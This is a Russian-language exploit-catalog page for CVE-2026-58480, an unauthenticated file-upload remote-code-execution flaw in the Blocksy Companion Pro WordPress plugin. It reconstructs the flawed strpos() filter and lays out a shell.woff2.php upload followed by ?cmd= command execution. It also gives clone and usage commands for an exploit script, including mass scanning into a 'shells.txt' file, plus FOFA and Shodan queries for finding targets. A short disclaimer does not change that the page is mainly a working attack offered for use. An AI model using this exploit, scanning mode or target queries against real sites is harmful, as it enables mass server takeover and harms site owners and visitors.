Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-58480 — CVE-2026-58480 / CVE-2026-15158 — Unauthenticated RCE in Blocksy Companion Pro < 2.1.47 (300K+ installs). Pre-auth arbitrary file upload via double-extension bypass. | Kitploit
Инструменты/GitHubGitHub/shinthink/cve-2026-58480
ReconnaissancePayload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubshinthink/cve-2026-58480

CVE-2026-58480

CVE-2026-58480 / CVE-2026-15158 — Unauthenticated RCE in Blocksy Companion Pro < 2.1.47 (300K+ installs). Pre-auth arbitrary file upload via double-extension bypass.

Репозиторий
325 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-58480 — Blocksy Companion Pro: неаутентифицированная загрузка файла с RCE

Расширенные отзывы → save_attachments → Пользовательские шрифты: обход strpos() → shell.woff2.php


Обзор

CVE-2026-58480 (также известный как CVE-2026-15158) — это критическая (CVSS 9.8) уязвимость неаутентифицированной произвольной загрузки файлов в Blocksy Companion Pro < 2.1.47 — премиум-дополнении для темы WordPress Blocksy (более 300 000 активных установок).

Обработчик AJAX save_attachments в функции Расширенные отзывы (часть WooCommerce Extra) принимает загрузку файлов без аутентификации. Расширение Пользовательские шрифты проверяет загрузки с помощью strpos() на наличие подстроки .woff2 / .ttf, а не фактического расширения файла. Злоумышленники обходят это с помощью имен файлов с двойным расширением, например shell.woff2.php: .woff2 соответствует проверке подстроки, а .php выполняется на сервере.

Затронутые версии

ВерсияСтатус
< 2.1.47Уязвимая
2.1.47+Исправлена

Требования: Премиум-лицензия с активными расширениями WooCommerce Extra (Расширенные отзывы) И Пользовательские шрифты. Бесплатный плагин blocksy-companion не содержит уязвимых участков кода.


Механизм уязвимости

Основная причина

Расширение Пользовательские шрифты регистрирует фильтр wp_check_filetype_and_ext, который проверяет имена файлов с помощью strpos() — поиска подстроки — вместо проверки фактического расширения файла через PATHINFO_EXTENSION:

root@kitploit:~
// framework/premium/extensions/custom-fonts/extension.php#L137 (реконструкция)
add_filter('wp_check_filetype_and_ext', function($data, $file, $filename, $mimes, $real_mime) {
    if (strpos($filename, '.woff2') !== false || 
        strpos($filename, '.ttf') !== false) {
        $data['ext'] = 'woff2';
        $data['type'] = 'font/woff2';
    }
    return $data;
}, 10, 5);

Функция save_attachments в Расширенных отзывах вызывает стандартную обработку загрузки WordPress, которая, в свою очередь, вызывает этот фильтр. Файл с именем shell.woff2.php проходит проверку, потому что .woff2 существует как подстрока — фильтр НЕ проверяет, что это конечное расширение.

Последовательность атаки

root@kitploit:~
POST /wp-admin/admin-ajax.php
  action=blc_save_review_attachments
  blc-review-images[] = shell.woff2.php (multipart, полезная нагрузка PHP)
→ фильтр wp_check_filetype_and_ext: найден ".woff2" → одобрено
→ файл сохранён в wp-content/uploads/YYYY/MM/shell.woff2.php
→ GET /wp-content/uploads/YYYY/MM/shell.woff2.php?cmd=id
→ RCE от имени www-data

Местоположение исходного кода

Файл (Trac)СтрокаНазначение
framework/premium/extensions/custom-fonts/extension.php137Фильтр проверки strpos()
framework/premium/extensions/woocommerce-extra/features/advanced-reviews/feature.php811Обработчик save_attachments

Установка

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-58480.git
cd CVE-2026-58480
pip install requests

Использование

root@kitploit:~
# Проверка цели
python exploit.py -u https://target.com --check

# Полная эксплуатация
python exploit.py -u https://target.com

# Массовое сканирование
python exploit.py -f targets.txt -o shells.txt

FOFA / Shodan

root@kitploit:~
FOFA:   body="/wp-content/themes/blocksy/"
Shodan: http.html:"blocksy-companion"

Ссылки

  • NVD CVE-2026-58480
  • OpenCVE CVE-2026-15158 — параметр blc-review-images[]
  • FreshySites Технический анализ — фильтр wp_check_filetype_and_ext
  • Wordfence Advisory
  • SecurityPointBreak
  • VulnCheck Advisory
  • WordPress Trac — Пользовательские шрифты
  • WordPress Trac — Расширенные отзывы

Отказ от ответственности

Этот эксплойт предоставлен только для образовательных целей и авторизованных исследований безопасности. Не используйте его против систем без явного разрешения владельца.

Скачать инструмент